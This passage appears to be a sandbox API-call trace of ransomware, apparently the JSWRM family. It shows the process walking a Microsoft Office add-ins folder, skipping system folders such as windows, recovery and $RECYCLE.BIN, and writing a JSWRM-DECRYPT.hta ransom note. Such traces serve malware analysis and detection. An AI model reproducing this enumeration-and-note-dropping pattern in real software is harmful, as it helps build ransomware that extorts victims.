Flags=0x0, Size=0x40) returned 0x20d698 [0126.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d698, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0126.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0126.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d728, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0126.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0126.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0126.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.770] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x238ed8d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x238ed8d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2984c3b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.770] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.770] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.770] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.770] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.770] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.770] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.770] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.770] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.770] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.770] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0126.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0126.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0126.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0126.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d770, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0126.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0126.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0126.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0126.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.771] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x36c7dee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ae8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.771] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.771] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.771] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.771] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.771] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.771] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.771] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.771] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.771] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.771] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d800, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0126.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d698, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0126.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e458 [0126.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0126.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.771] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x68b32cb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68b32cb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x68b32cb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.771] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.771] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.771] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.771] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.771] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.771] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.771] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.772] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.772] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.772] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0126.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0126.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0126.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.772] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x863456d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.772] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.772] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.772] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.772] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.772] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.772] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.772] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.772] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.772] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.772] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0126.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0126.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0126.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0126.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0126.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.773] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x863456d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.773] FindClose (in: hFindFile=0x231e80 | out: hFindFile=0x231e80) returned 1 [0126.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0126.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0126.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0126.773] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45d3b76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0126.773] lstrcmpiW (lpString1="no", lpString2=".") returned 1 [0126.773] lstrcmpiW (lpString1="no", lpString2="..") returned 1 [0126.773] lstrcmpiW (lpString1="no", lpString2="...") returned 1 [0126.773] lstrcmpiW (lpString1="no", lpString2="windows") returned -1 [0126.773] lstrcmpiW (lpString1="no", lpString2="recovery") returned -1 [0126.773] lstrcmpiW (lpString1="no", lpString2="perflogs") returned -1 [0126.773] lstrcmpiW (lpString1="no", lpString2="documents and settings") returned 1 [0126.773] lstrcmpiW (lpString1="no", lpString2="$RECYCLE.BIN") returned 1 [0126.773] lstrcmpiW (lpString1="no", lpString2="system volume information") returned -1 [0126.773] lstrcmpiW (lpString1="no", lpString2="msocache") returned 1 [0126.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0126.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0126.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0126.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0126.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0126.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0126.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\no\\jswrm-decrypt.hta")) returned 0xffffffff [0126.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0126.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0126.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0126.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0126.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0126.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0126.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\no\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.775] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.775] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.776] CloseHandle (hObject=0x314) returned 1 [0126.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0126.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0126.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0126.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0126.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0126.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0126.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0126.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0126.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\no\\jswrm-decrypt.hta")) returned 0x20 [0126.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0126.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0126.777] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\no\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45d3b76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x423915a2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0126.777] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.777] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45d3b76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x423915a2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 